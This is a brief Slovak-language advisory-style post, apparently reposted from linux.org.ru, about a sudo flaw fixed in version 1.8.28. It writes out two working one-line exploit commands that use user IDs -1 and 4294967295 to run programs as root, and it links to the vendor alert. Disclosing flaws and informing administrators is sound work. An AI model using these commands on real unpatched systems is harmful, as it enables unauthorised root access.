Chyba v sudo vám umožňuje spustiť akýkoľvek spustiteľný súbor ako root, ak /etc/sudoers umožňuje jeho spustenie iným používateľom a je zakázané pre root.
Využitie chyby je veľmi jednoduché:
sudo -u#-1 id -u
alebo:
sudo -u#4294967295 id -u
Chyba je prítomná vo všetkých verziách sudo pred 1.8.28
podrobnosti:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Zdroj: linux.org.ru
